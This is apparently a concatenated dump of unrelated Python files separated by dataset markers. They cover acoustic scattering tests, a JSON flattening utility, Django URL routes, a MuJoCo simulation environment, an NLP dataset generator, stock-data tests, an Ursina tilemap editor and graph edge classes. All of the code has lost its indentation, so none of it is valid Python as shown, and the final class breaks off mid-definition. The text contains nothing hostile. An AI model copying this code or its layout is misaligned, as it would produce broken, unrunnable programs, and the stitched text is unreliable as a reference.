# Analytical expressions for isospeed case
# 1-D calculations
# compute full source vector for projection
r_src = np.array([xaxis, eta - z_src])
d_src = np.linalg.norm(r_src, axis=0)
n = np.array([-eta_dx, np.ones_like(xaxis)])
proj_src = np.einsum('ik,ik->k', n, r_src) / d_src
# greens function from source
kaxis = 2 * pi * faxis[:, None] / c
dpdn_g_as_point = -1j * kaxis * proj_src / (4 * pi * d_src) \
* np.exp(-1j * kaxis * d_src)
dpdn_g_as_line = -(1j / 4) * kaxis * proj_src * hankel2(1, kaxis * d_src)
# receiver vector
d_rcr = np.sqrt((x_rcr - xaxis) ** 2 + (z_rcr - eta) ** 2)
g_ra_point = np.exp(-1j * kaxis * d_rcr) / (4 * pi * d_rcr)
g_ra_line = (1j / 4) * hankel2(0, kaxis * d_rcr)
# 2-D calculations
# compute full 2D source vector for projection
r_src = np.array([*np.meshgrid(xaxis, yaxis, indexing='ij'), eta_2D - z_src])
d_src_2D = np.linalg.norm(r_src, axis=0)
n = np.array([-eta_dx_2D, np.zeros_like(eta_dx_2D), np.ones_like(eta_2D)])
proj_src_2D = np.einsum('ijk,ijk->jk', n, r_src) / d_src_2D
r_rcr = np.array([*np.meshgrid(x_rcr - xaxis, yaxis, indexing='ij'), z_rcr - eta_2D])
d_rcr_2D = np.linalg.norm(r_rcr, axis=0)
# greens function from source
k_ = 2 * pi * faxis[:, None, None] / c
ds_ = d_src_2D[None, :, :]
dr_ = d_rcr_2D[None, :, :]
ne_str = '-1j * k_ * proj_src_2D / (4 * pi * ds_) * exp(-1j * k_ * ds_)'
dpdn_g_as_2D = ne.evaluate(ne_str)
ne_str = 'exp(-1j * k_ * dr_) / (4 * pi * dr_)'
g_ra_2D = ne.evaluate(ne_str)
# surface integral for pressure at receiver
# 1-D geometry
kc = 2 * pi * fc / c
p_rcr_1D, taxis_1D = p_sca(2 * dpdn_g_as_line,
g_ra_line,
dx,
sig_FT,
faxis,
(d_src + d_rcr) / c,
tau_img,
tau_lim,
spreading=kc)
# stationary phase
# compute spreading factor for stationary phase approximation
# second derivative of (d_src + d_rcr) wrt y
d2d = (1 / d_src + 1 / d_rcr) / c
p_rcr_sta, taxis_sta = p_sca(2 * dpdn_g_as_point,
g_ra_point,
dx,
sig_FT,
faxis,
(d_src + d_rcr) / c,
tau_img,
tau_lim,
spreading=d2d)
# 2D integration
p_rcr_2D, taxis_2D = p_sca(2 * dpdn_g_as_2D,
g_ra_2D,
dx,
sig_FT,
faxis,
(d_src_2D + d_rcr_2D) / c,
tau_img,
tau_lim)
# Wave number synthesis for pressure at receiver
eva_range = 0.1
num_eva = 10
numquad = 50000
# vector element formulation used in periodic solution
rsrc = np.array([0., z_src])
rrcr = np.array([x_rcr, z_rcr])
def p_KA(facous, rANA, sol_type='KA'):
# periodic scatter solution
tcoarse = make_theta_axis(2000, eva_range)
if sol_type == 'KA':
func = rANA.hka_coefficents
else:
func = rANA.rfm_1st
r0, q0 = func(tcoarse[0], facous, num_eva)
rn1, qn1 = func(tcoarse[-1], facous, num_eva)
all_qs = np.unique(np.hstack([q0, qn1]))
one_freq = np.zeros((tcoarse.size, all_qs.size), dtype=np.complex_)
one_freq[0, np.isin(all_qs, q0)] = r0
one_freq[-1, np.isin(all_qs, qn1)] = rn1
for i, t in enumerate(tcoarse[1: -1]):
r, q = func(t, facous, num_eva)
one_freq[i + 1, np.isin(all_qs, q)] = r
print('computing freq {}'.format(facous))
p_sca = rANA.bragg.quad(all_qs, tcoarse, one_freq, numquad, eva_range, rsrc,
rrcr, facous)
return p_sca
rANA = CosineRs(H, L, attn=1e-9)
start_phase = -1j * 2 * np.pi * faxis * taxis_1D[0]
p_FT_KA = np.zeros(faxis.size, dtype=complex)
fci = faxis > 1
p_FT_KA[fci] = np.squeeze(np.array([p_KA(f, rANA, sol_type='RFM') for f in faxis[fci]]))
channel_FD = p_FT_KA * np.conj(sig_FT)
p_wn_KA = np.fft.irfft(np.conj(np.exp(start_phase) * channel_FD), axis=0)
fig, ax = plt.subplots()
p_dB = 20 * (np.log10(np.abs(hilbert(p_wn_KA)) + np.spacing(1))
- np.log10(np.abs(p_ref)))
plt.plot(taxis_1D - tau_img, p_dB)
p_dB = 20 * (np.log10(np.abs(hilbert(p_rcr_1D)) + np.spacing(1))
- np.log10(np.abs(p_ref)))
plt.plot(taxis_1D - tau_img, p_dB)
num_tail = 35
def ts_error(ts, ts_ref, num_tail):
"""Error metric used to compare time series"""
error_norm = np.max(np.abs(ts_ref[:-num_tail]))
error = np.max(np.abs(ts[:-num_tail] - ts_ref[:-num_tail]))
return error / error_norm
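# For example, ts_error(ts, ts_ref, 35) is the peak absolute deviation between the two
# series (ignoring the last 35 samples), normalised by the peak of the reference series.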
# max allowed relative error
max_error = 0.001
# check line source solutions
assert(ts_error(p_ls_fan, p_rcr_1D, num_tail) < max_error)
# check point source solutions
assert(ts_error(p_sta_fan, p_rcr_sta, num_tail) < max_error)
assert(ts_error(p_rcr_2D, p_rcr_sta, num_tail) < max_error)
assert(ts_error(p_2D_fan, p_rcr_sta, num_tail) < max_error)
print('All iso-speed sinusoidal surface tests passed')
|
StarcoderdataPython
|
1686355
|
<filename>piano_utils/utils/flatten_json.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2016 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import sys
from collections import Iterable
def check_if_numbers_are_consecutive(list_):
"""
Returns True if numbers in the list are consecutive
:param list_: list of integers
:return: Boolean
"""
return all([True if second - first == 1 else False
for first, second in zip(list_[:-1], list_[1:])])
def _construct_key(previous_key, separator, new_key):
"""
Returns the new_key if no previous key exists, otherwise concatenates previous key, separator, and new_key
:param previous_key:
:param separator:
:param new_key:
:return: a string if previous_key exists and simply passes through the new_key otherwise
"""
if previous_key:
return "{}{}{}".format(previous_key, separator, new_key)
else:
return new_key
def flatten(nested_dict, separator="_", root_keys_to_ignore=set()):
"""
Flattens a dictionary with nested structure to a dictionary with no hierarchy
Consider ignoring keys that you are not interested in to prevent unnecessary processing
This is specially true for very deep objects
:param nested_dict: dictionary we want to flatten
:param separator: string to separate dictionary keys by
:param root_keys_to_ignore: set of root keys to ignore from flattening
:return: flattened dictionary
"""
assert isinstance(nested_dict, dict), "flatten requires a dictionary input"
assert isinstance(separator, str), "separator must be a string"
# This global dictionary stores the flattened keys and values and is ultimately returned
flattened_dict = dict()
def _flatten(object_, key):
"""
For dict, list and set objects_ calls itself on the elements and for other types assigns the object_ to
the corresponding key in the global flattened_dict
:param object_: object to flatten
:param key: carries the concatenated key for the object_
:return: None
"""
if isinstance(object_, dict):
for object_key in object_:
if not (not key and object_key in root_keys_to_ignore):
_flatten(object_[object_key], _construct_key(key, separator, object_key))
elif isinstance(object_, list) or isinstance(object_, set):
for index, item in enumerate(object_):
_flatten(item, _construct_key(key, separator, index))
else:
flattened_dict[key] = object_
_flatten(nested_dict, None)
return flattened_dict
flatten_json = flatten
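# A minimal usage sketch (hypothetical input, not part of the original module):
# flatten({"a": {"b": 1}, "c": [2, 3]}) returns {"a_b": 1, "c_0": 2, "c_1": 3},
# since nested keys are joined with the separator and list items are keyed by index.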
def _unflatten_asserts(flat_dict, separator):
assert isinstance(flat_dict, dict), "un_flatten requires a dictionary input"
assert isinstance(separator, str), "separator must be a string"
assert all((not isinstance(value, Iterable) or isinstance(value, str) or isinstance(value, unicode)
for value in flat_dict.values())), "provided dictionary is not flat"
def unflatten(flat_dict, separator='_'):
"""
Creates a hierarchical dictionary from a flattened dictionary
Assumes no lists are present
:param flat_dict: a dictionary with no hierarchy
:param separator: a string that separates keys
:return: a dictionary with hierarchy
"""
_unflatten_asserts(flat_dict, separator)
# This global dictionary is mutated and returned
unflattened_dict = dict()
def _unflatten(dic, keys, value):
for key in keys[:-1]:
dic = dic.setdefault(key, {})
dic[keys[-1]] = value
for item in flat_dict:
_unflatten(unflattened_dict, item.split(separator), flat_dict[item])
return unflattened_dict
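# A small illustration (hypothetical input): unflatten({"a_b": 1, "a_c": 2}) rebuilds
# the hierarchy {"a": {"b": 1, "c": 2}} by splitting each key on the separator.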
def unflatten_list(flat_dict, separator='_'):
"""
Unflattens a dictionary, first assuming no lists exist and then tries to identify lists and replaces them
This is probably not very efficient and has not been tested extensively
Feel free to add test cases or rewrite the logic
Issues that stand out to me:
- Sorting all the keys in the dictionary, which specially for the root dictionary can be a lot of keys
- Checking that numbers are consecutive is O(N) in number of keys
:param flat_dict: dictionary with no hierarchy
:param separator: a string that separates keys
:return: a dictionary with hierarchy
"""
_unflatten_asserts(flat_dict, separator)
# First unflatten the dictionary assuming no lists exist
unflattened_dict = unflatten(flat_dict, separator)
def _convert_dict_to_list(object_, parent_object, parent_object_key):
if isinstance(object_, dict):
try:
keys = [int(key) for key in object_]
keys.sort()
except (ValueError, TypeError):
keys = []
keys_len = len(keys)
if (keys_len > 0 and sum(keys) == int(((keys_len - 1) * keys_len) / 2) and keys[0] == 0 and
keys[-1] == keys_len - 1 and check_if_numbers_are_consecutive(keys)):
# The dictionary looks like a list so we're going to replace it as one
parent_object[parent_object_key] = [object_[str(key)] for key in keys]
for key in object_:
if isinstance(object_[key], dict):
_convert_dict_to_list(object_[key], object_, key)
_convert_dict_to_list(unflattened_dict, None, None)
return unflattened_dict
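# A small illustration (hypothetical input): unflatten_list({"a_0": 1, "a_1": 2, "b_c": 3})
# first unflattens to {"a": {"0": 1, "1": 2}, "b": {"c": 3}} and then rewrites the
# consecutive-integer-keyed dict under "a" as a list, giving {"a": [1, 2], "b": {"c": 3}}.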
def cli(input_stream=sys.stdin, output_stream=sys.stdout):
import json
raw = input_stream.read()
input_json = json.loads(raw)
output = json.dumps(flatten(input_json))
output_stream.write(output)
if __name__ == '__main__':
cli()
|
StarcoderdataPython
|
9419
|
# Copyright 2005-2008, <NAME>
# Copyright 2010, 2012 <NAME>
# This software's license gives you freedom; you can copy, convey,
# propagate, redistribute, modify and/or redistribute modified versions of
# this program under the terms of the GNU Affero General Public License
# (AGPL) as published by the Free Software Foundation (FSF), either
# version 3 of the License, or (at your option) any later version of the
# AGPL published by the FSF.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero
# General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program in a file in the toplevel directory called
# "AGPLv3". If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import url, include
from django.contrib import admin, admindocs
from conservancy import feeds, frontpage, sponsors
import conservancy.apps.fundgoal.views as fundgoal_views
import conservancy.static.views as static_views
admin.autodiscover()
urlpatterns = [
url(r'^$', frontpage.view),
url(r'^sponsors$', frontpage.view),
url(r'^sponsors/$', sponsors.view),
url(r'^sponsors/index.html$', sponsors.view),
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
url(r'^admin/', admin.site.urls),
url(r'^feeds/blog/?$', feeds.BlogFeed()),
url(r'^feeds/news/?$', feeds.PressReleaseFeed()),
url(r'^feeds/omnibus/?$', feeds.OmnibusFeed()),
url(r'^feeds/?$', feeds.view),
url(r'^news(/|$)', include('conservancy.apps.news.urls')),
url(r'^blog(/|$)', include('conservancy.apps.blog.urls')),
# formerly static templated things... (dirs with templates)
url(r'^error/(40[134]|500)(?:/index\.html|/|)$', static_views.handler),
url(r'^error', static_views.index),
url(r'^about', static_views.index),
url(r'^donate', static_views.index),
url(r'^copyleft-compliance', static_views.index,
{'fundraiser_sought' : 'vmware-match-0'}),
url(r'^projects', static_views.index),
url(r'^npoacct', static_views.index,
{'fundraiser_sought' : 'npoacct'}),
url(r'^contractpatch', include('conservancy.apps.contractpatch.urls')),
url(r'^overview', static_views.index),
url(r'^privacy-policy', static_views.index),
url(r'^supporter', include('conservancy.apps.supporter.urls')),
url(r'^fundraiser_data', fundgoal_views.view),
]
|
StarcoderdataPython
|
22091
|
<reponame>zaynahjaved/AWAC<gh_stars>0
'''
All cartgripper env modules built on cartrgipper implementation in
https://github.com/SudeepDasari/visual_foresight
'''
from abc import ABC
from mujoco_py import load_model_from_path, MjSim
import numpy as np
from base_env import BaseEnv
class BaseMujocoEnv(BaseEnv, ABC):
def __init__(self, model_path, _hp):
super(BaseMujocoEnv, self).__init__()
self._frame_height = _hp.viewer_image_height
self._frame_width = _hp.viewer_image_width
self._reset_sim(model_path)
self._base_adim, self._base_sdim = None, None #state/action dimension of Mujoco control
self._adim, self._sdim = None, None #state/action dimension presented to agent
self.num_objects, self._n_joints = None, None
self._goal_obj_pose = None
self._goaldistances = []
self._ncam = _hp.ncam
if self._ncam == 2:
self.cameras = ['maincam', 'leftcam']
elif self._ncam == 1:
self.cameras = ['maincam']
else:
raise ValueError
self._last_obs = None
self._hp = _hp
def _default_hparams(self):
parent_params = super()._default_hparams()
parent_params['viewer_image_height'] = 256
parent_params['viewer_image_width'] = 256
parent_params['ncam'] = 1
return parent_params
def set_goal_obj_pose(self, pose):
self._goal_obj_pose = pose
def _reset_sim(self, model_path):
"""
Creates a MjSim from passed in model_path
:param model_path: Absolute path to model file
:return: None
"""
self._model_path = model_path
self.sim = MjSim(load_model_from_path(self._model_path))
def reset(self):
self._goaldistances = []
def render(self):
""" Renders the enviornment.
Implements custom rendering support. If mode is:
- dual: renders both left and main cameras
- left: renders only left camera
- main: renders only main (front) camera
:param mode: Mode to render with (dual by default)
:return: uint8 numpy array with rendering from sim
"""
images = np.zeros(
(self._ncam, self._frame_height, self._frame_width, 3),
dtype=np.uint8)
for i, cam in enumerate(self.cameras):
images[i] = self.sim.render(
self._frame_width, self._frame_height, camera_name=cam)
return images
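    # Illustrative note: with the default hparams (ncam=1 and 256x256 viewer images),
    # render() returns an array of shape (1, 256, 256, 3) with dtype uint8.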
@property
def adim(self):
return self._adim
@property
def sdim(self):
return self._sdim
@property
def ncam(self):
return self._ncam
|
StarcoderdataPython
|
161146
|
import os
import random
import yaml
from collections import Counter
from nltk.corpus import movie_reviews
from nltk.corpus import senseval
import pandas as pd
import json
class datasetGenerator:
"""
creates a base dataset from senseval in NLTK
    it generates the data.json dataset by instantiating it
or by retrieving data from https://github.com/sebischair/NLU-Evaluation-Corpora
create chatito https://rodrigopivi.github.io/Chatito/
"""
    # TODO: consolidate dataflow to pandas dataframe and csv or yaml
def __init__(self, dataset="", size=200, filename="data.json", randomSeed=42):
if dataset == "":
if "json.data" in os.walk(os.path.join("..", "data", filename)):
return
else:
dataset = "senseval"
if dataset == "senseval":
self.instances = senseval.instances("hard.pos")
self.getDataNLTK()
self.sampleData(size, randomSeed)
self.saveData()
if (
dataset == "AskUbuntuCorpus"
or dataset == "ChatbotCorpus"
or dataset == "WebApplicationsCorpus"
):
self.getDataJson(dataset)
self.sampleData(size, randomSeed)
self.saveData()
if dataset not in [
"",
"senseval",
"AskUbuntuCorpus",
"ChatbotCorpus",
"WebApplicationsCorpus",
]:
raise Exception("not implemented other dataset than senseval")
def getDataNLTK(self):
self.labels = []
self.sentences = []
for instance in self.instances:
try:
self.sentences.append(
" ".join([i for i, _ in instance.context if i.isalpha()])
)
self.labels.append(instance.senses[0])
except:
pass
def getDataJson(self, filename):
with open(
os.path.join("..", "data", filename + ".json"), encoding="utf8"
) as datafile:
data = json.load(datafile)
df = pd.DataFrame(data["sentences"])
df = df.loc[df["intent"] != "None"]
df = self.changeToCompliantLabel(df)
self.labels = df.intent.tolist()
self.sentences = df.text.tolist()
def changeToCompliantLabel(self, df):
def getCompliantLabel(uniqueLabel):
return "".join([c for c in uniqueLabel if c.isalpha()])
self.uniqueLabels = df.intent.unique()
for uL in self.uniqueLabels:
df["intent"].replace(uL, getCompliantLabel(uL), inplace=True)
return df
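    # Illustrative example: a label such as "Setup Printer" would be rewritten to
    # "SetupPrinter", since getCompliantLabel keeps only alphabetic characters.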
def sampleData(self, size=200, randomSeed=42):
random.seed(randomSeed)
self.sampleList = random.sample(
range(len(self.sentences)), min(size, len(self.sentences))
)
self.sentences = [self.sentences[i] for i in self.sampleList]
self.labels = [self.labels[i] for i in self.sampleList]
self.uniqueLabels = dict(Counter(self.labels))
def saveData(self, filename="data.csv"):
df = pd.DataFrame(data={"sentences": self.sentences, "labels": self.labels})
        df.to_csv(os.path.join("..", "data", filename), index=False)
if __name__ == "__main__":
a = datasetGenerator("AskUbuntuCorpus")
|
StarcoderdataPython
|
142721
|
<filename>test/cases/apps/stocking/actions_test.py
import sys
from pathlib import Path
sys.path.append(str(Path(__file__).parent.parent.parent.parent.parent))
from apps.stocking.actions.fetch import fetch_data
from apps.stocking import logger
from apps.stocking.actions.make import make_x, make_y, make_xy
from apps.stocking.estimators import y_categorifier
import pandas as pd
err_code = 'sh000789'
corr_code = 'sz000789'
ds = pd.read_csv(Path(__file__).parent.parent.parent.parent / 'fixtures/sz002415.csv',
index_col=0)
def test_fetch_data():
df = fetch_data(err_code)
assert df is None
df = fetch_data(corr_code)
logger.info(df)
assert len(df) > 2000
def test_make_x():
x = make_x(range(1, 5), ds, ['trade', 'turnover'], past_days=2)
assert x.iloc[0, 3] == x.iloc[1, 1]
assert len(x) == 4
assert len(x.columns) == 4
assert x.columns[0] == 'p1_trade'
cate_y = y_categorifier([{
    "name": "decline",
    "threshold": -99999
}, {
    "name": "up 0-3%",
    "threshold": 0
}, {
    "name": "up 3-6%",
    "threshold": 0.03
}, {
    "name": "up 6-10%",
    "threshold": 0.06
}, {
    "name": "up over 10%",
    "threshold": 0.1
}])
def test_cate_y():
assert cate_y(0.01) == 1
assert cate_y(0.12) == 4
assert cate_y(0.08) == 3
assert cate_y(0.05) == 2
assert cate_y(-0.6) == 0
assert cate_y(-0.03) == 0
def test_make_y():
y, yvc = make_y(range(3, 100),
ds,
cols=['high', 'close'],
future_days=10,
categorify=cate_y)
assert y.iloc[0] == cate_y(float(yvc.iloc[0]['y_c'].replace('%', '')) / 100)
assert y.iloc[49] == cate_y(float(yvc.iloc[49]['y_c'].replace('%', '')) / 100)
assert y.iloc[65] == cate_y(float(yvc.iloc[65]['y_c'].replace('%', '')) / 100)
assert y.iloc[73] == cate_y(float(yvc.iloc[73]['y_c'].replace('%', '')) / 100)
|
StarcoderdataPython
|
1624292
|
from django.apps import AppConfig
class SchaftConfig(AppConfig):
name = 'schaft'
|
StarcoderdataPython
|
3315031
|
<reponame>LyfeOnEdge/ursina
from ursina import *
from ursina.prefabs.grid_editor import GridEditor, PixelEditor
import re
class Tilemap(GridEditor):
def __init__(self, tilemap='', tileset='', tileset_size=(8,8), **kwargs):
if isinstance(tilemap, str):
self.tilemap = load_texture(tilemap)
self.grid = [[self.tilemap.get_pixel(x,y) for y in range(self.tilemap.height)] for x in range(self.tilemap.width)]
super().__init__(
texture=self.tilemap,
size=self.tilemap.size,
palette=(color.white, color.black, color.green, color.blue, color.red),
edit_mode=False,
**kwargs)
self.tileset = tileset
self.tileset_size = tileset_size
self.model = Mesh()
self.texture = tileset
self.colliders = list()
# self.texture.filtering = None
# self.grid = [[self.tilemap.get_pixel(x,y) for y in range(self.h)] for x in range(self.w)]
self.auto_render = False
self.outline = Entity(parent=self, model=Quad(segments=0, mode='line', thickness=1), color=color.cyan, z=.01, origin=(-.5,-.5), enabled=self.edit_mode)
self._quad = Quad(segments=0)
self._quad.vertices = [Vec3(*v)+Vec3(.5,.5,0) for v in self._quad.vertices]
self._garbage = Entity(parent=self, add_to_scene_entities=False)
self.uv_dict = {
'11111111' : [(4,1), (5,1), (6,1), (7,1)], # fill
'0.11111.' : [(1,3), (2,3), (5,3), (6,3)], # top
'1.0.1111' : [(3,2), (3,1)], # right
'111.0.11' : [(2,0), (1,0), (6,2), (5,2)], # bot
'11111.0.' : [(0,1), (0,2)], # left
'000.111.' : [(3,3), ], # corner_top_right
'1.000.11' : [(3,0), ], # corner_bot_right
'111.000.' : [(0,0), ], # corner_bot_left
'0.111.00' : [(0,3), ], # corner_top_left
'10111111' : [(1,1), ], #inner_corner_bot_left
'11101111' : [(1,2), ], #inner_corner_top_left
'11111011' : [(2,2), ], #inner_corner_top_right
'11111110' : [(2,1), ], #inner_corner_bot_right
}
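        # Note: each uv_dict key is a regular expression matched (via re.match in render())
        # against an 8-character string of neighbour-occupancy bits, listed clockwise starting
        # from the tile above. For example '0.11111.' requires the tile above to be empty,
        # the five positions from right round to left to be occupied, and leaves the two
        # top corners unconstrained.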
self.single_block_coordinates = [(4,0), (5,0), (6,0), (7,0)]
self.variation_chance = [0,0,0,0,1,1,1,2,2,3]
if 'min' in self.texture.name:
self.uv_dict = {
'11111111' : [(1,1)], # fill
'0.11111.' : [(1,2)], # top
'111.0.11' : [(1,0), ], # bot
'1.0.1111' : [(0,1), '-1,1'], # right
'11111.0.' : [(0,1)], # left
'0.111.00' : [(0,2), ], # corner_top_left
'000.111.' : [(0,2), '-1,1'], # corner_top_right
'1.000.11' : [(0,2), '-1,-1'], # corner_bot_right
'111.000.' : [(0,2), '1,-1'], # corner_bot_left
'11111110' : [(2,0), ], #inner_corner_bot_right
'10111111' : [(2,0), '-1,1'], #inner_corner_bot_left
'11111011' : [(2,1), ], #inner_corner_top_right
'11101111' : [(2,1), '-1,1'], #inner_corner_top_left
}
self.single_block_coordinates = [(2,2)]
self.variation_chance = [0,]
self.uv_margin = .002
self.render()
def update(self):
if not self.edit_mode:
return
super().update()
if mouse.left:
self.draw_temp(self.cursor.position)
def draw_temp(self, position):
e = Entity(
parent=self._garbage,
model='quad',
scale=Vec3(1/self.tilemap.width, 1/self.tilemap.height, 1) * self.brush_size,
position=self.cursor.position,
z=-.1,
texture=self.texture,
texture_scale=Vec2(1/self.tileset_size[0], 1/self.tileset_size[1]),
texture_offset=Vec2(.33, .33),
origin=(-.5,-.5),
ignore=True,
)
if self.selected_char == self.palette[0]:
e.color = window.color
e.texture = None
def input(self, key):
super().input(key)
if key == 'left mouse up':
for e in self._garbage.children:
destroy(e)
def render(self):
self.scale = self.tilemap.size
self.model.clear()
for e in self.colliders:
destroy(e)
self.colliders.clear()
tile_size = Vec2(1/self.tileset_size[0], 1/self.tileset_size[1])
i = 0
for y in range(self.tilemap.height):
collider = None
for x in range(self.tilemap.width):
col = self.grid[x][y]
if col == color.white and collider: # end collider
collider = None
if col != color.white: #
self.model.vertices.extend([Vec3(x/self.tilemap.width, y/self.tilemap.height, 0) + (v*1/self.tilemap.width) for v in self._quad.vertices]) # add quad vertices, but offset.
self.model.triangles.append([i+j for j in range(4)])
neighbours = list()
# register neighbours clockwise starting from the top
for offset in [(0,1), (1,1), (1,0), (1,-1), (0,-1), (-1,-1), (-1,0), (-1,1)]:
try:
neighbours.append(self.grid[x+offset[0]][y+offset[1]] != color.white)
except IndexError:
neighbours.append(1)
neighbours = ''.join([str(int(e)) for e in neighbours])
# if collider is None and neighbours != '11111111':
# collider = Entity(
# parent=self,
# model='cube',
# scale_x=Vec3(0, 1/self.tilemap.height, 1),
# origin_x=-.5,
# position=(x-.5, y/self.tilemap.height),
# collider='box',
# color=color.red
# )
# self.colliders.append(collider)
# if collider and neighbours == '11111111': # end collider if it's a middle block
# collider = None
# if collider:
# collider.scale_x += 1/self.tilemap.width
random.seed(y+x)
variation_index = random.choice(self.variation_chance)
tile_scale = '1,1'
for key, value in self.uv_dict.items():
if re.match(key, neighbours):
if isinstance(value[-1], str):
tile_scale = value[-1]
variation_index = min(variation_index, len(value)-1-int(tile_scale=='1,1'))
_x, _y = value[variation_index]
break
else:
_x, _y = self.single_block_coordinates[variation_index]
uv = [
Vec2(tile_size[0] * _x, tile_size[1] * _y) + Vec2(self.uv_margin, self.uv_margin),
Vec2(tile_size[0] * (_x+1), tile_size[1] * _y) + Vec2(-self.uv_margin, self.uv_margin),
Vec2(tile_size[0] * (_x+1), tile_size[1] * (_y+1)) + Vec2(-self.uv_margin, -self.uv_margin),
Vec2(tile_size[0] * _x, tile_size[1] * (_y+1)) + Vec2(self.uv_margin, -self.uv_margin),
]
if tile_scale == '1,1':
pass
elif tile_scale == '-1,1':
a, b, c, d = uv
uv = [b, a, d, c]
elif tile_scale == '1,-1':
a, b, c, d = uv
uv = [d, c, b, a]
elif tile_scale == '-1,-1':
a, b, c, d = uv
uv = [c, d, a, b]
self.model.uvs.extend(uv)
i += 4
self.model.generate() # call to create the mesh
def save(self):
for y in range(self.tilemap.height):
for x in range(self.tilemap.width):
self.tilemap.set_pixel(x, y, self.grid[x][y])
if self.tilemap.path:
self.tilemap.save(self.tilemap.path)
print('saving:', self.tilemap.path)
if __name__ == '__main__':
app = Ursina()
EditorCamera()
tilemap = Tilemap('tilemap_test_level', tileset='test_tileset', tileset_size=(8,4), parent=scene)
# tilemap = Tilemap('brick', tileset='tileset_cave', tileset_size=(8,4), parent=scene)
camera.orthographic = True
camera.position = tilemap.tilemap.size / 2
camera.fov = tilemap.tilemap.height
Text('press tab to toggle edit mode', origin=(.5,0), position=(-.55,.4))
app.run()
|
StarcoderdataPython
|
3216292
|
<gh_stars>0
# Databricks notebook source
# MAGIC %run ./app/bootstrap
# COMMAND ----------
# MAGIC %load_ext autoreload
# MAGIC %autoreload 2
# COMMAND ----------
from daipeproject.test_modelu import print_hello
print_hello()
# COMMAND ----------
print_hello()
|
StarcoderdataPython
|
3366757
|
import pandas as pd
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--saveFile', type=str, default='./btPreds1.csv')
args = parser.parse_args()
with open('pred_engg1.txt') as f:
    preds = f.readlines()
with open('../../dataset/dataToUse/UrIIICompSents/evaluate.sum') as f:
    inps = f.readlines()
with open('../../dataset/dataToUse/UrIIICompSents/evaluate.eng') as f:
    actual = f.readlines()
print(len(preds), len(inps), len(actual))
pd.DataFrame({'input': inps, 'actual': actual, 'preds': preds}).to_csv(args.saveFile)
|
StarcoderdataPython
|
3341358
|
# coding: utf8
'''
This code is about the graph we build - edges and nodes (nodes are called Blocks)
<NAME>
March 3rd, 2016
Copyright Xerox 2016
'''
DEBUG=0
#DEBUG=1
# --- Edge CLASSE -----------------------------------------
class Edge:
def __init__(self, A, B):
"""
An edge from A to B
"""
self.A = A
self.B = B
def __str__(self):
n = 15 #show only the n leading characters of each node
if True:
return "Edge %s p%d-p%d %s --> %s" %(self.__class__, self.A.pnum, self.B.pnum, self.A.getText(n), self.B.getText(n))
else:
return "Edge %s p%d-p%d %s -->\n\t %s" %(self.__class__, self.A.pnum, self.B.pnum, self.A, self.B)
def revertDirection(self):
"""
revert the direction of the edge
"""
self.A, self.B = self.B, self.A
def computeOverlap(self):
"""
compute the overlap between the two nodes
return 0 or a positive number in case of overlap
"""
return 0
def computeOverlapPosition(self):
"""
compute the overlap between the two nodes and its position
relative to each node.
The overlap is a length
The position is a number in [-1, +1] relative to the center of a node.
-1 denote left or top, +1 denotes right or bottom.
The position is the position of the center of overlap.
return a tuple: (overlap, pos_on_A, pos_on_B)
"""
return 0, 0, 0
# ------------------------------------------------------------------------------------------------------------------------------------
#specific code for the CRF graph
def computeEdges(cls, lPrevPageEdgeBlk, lPageBlk, iGraphMode, bShortOnly=False):
"""
we will compute the edge between those nodes, some being on previous "page", some on "current" page.
if bShortOnly, we filter intra-page edge and keep only "short" ones
"""
from . import Block
lAllEdge = list()
#--- horizontal and vertical neighbors
lHEdge, lVEdge = Block.Block.findPageNeighborEdges(lPageBlk, bShortOnly, iGraphMode=iGraphMode)
lAllEdge.extend(lHEdge)
lAllEdge.extend(lVEdge)
if DEBUG:
cls.dbgStorePolyLine("neighbors", lHEdge)
cls.dbgStorePolyLine("neighbors", lVEdge)
#--- overlap with previous page
if lPrevPageEdgeBlk:
lConseqOverEdge = Block.Block.findConsecPageOverlapEdges(lPrevPageEdgeBlk, lPageBlk)
lAllEdge.extend(lConseqOverEdge)
return lAllEdge
computeEdges = classmethod(computeEdges)
def dbgStorePolyLine(cls, sAttr, lEdge):
"""
Store a polyline in the given attribute
"""
for e in lEdge:
xA, yA = e.A.getCenter()
xB, yB = e.B.getCenter()
ndA = e.A.node
sPolyLine = "%.1f,%.1f,%.1f,%.1f,%.1f,%.1f"%(xA,yA,xB,yB,xA,yA)
if ndA.hasProp(sAttr):
ndA.set(sAttr, ndA.prop(sAttr) + "," + sPolyLine)
else:
ndA.set(sAttr, sPolyLine)
return
dbgStorePolyLine = classmethod(dbgStorePolyLine)
# --- Edge SUB-CLASSES ------------------------------------
class SamePageEdge(Edge):
def __init__(self, A, B, length, overlap):
Edge.__init__(self, A, B)
self.length = length
self.overlap = overlap
self.iou = 0
class CrossPageEdge(Edge): pass
class CrossMirrorPageEdge(Edge): pass
class CrossMirrorContinuousPageVerticalEdge(Edge):
def __init__(self, A, B, length, overlap):
Edge.__init__(self, A, B)
self.length = length
self.overlap = overlap
self.iou = 0
class VirtualEdge(Edge): pass
# --- SamePageEdge SUB-CLASSES ----------------------------
class HorizontalEdge(SamePageEdge):
def __init__(self, A, B, length, overlap):
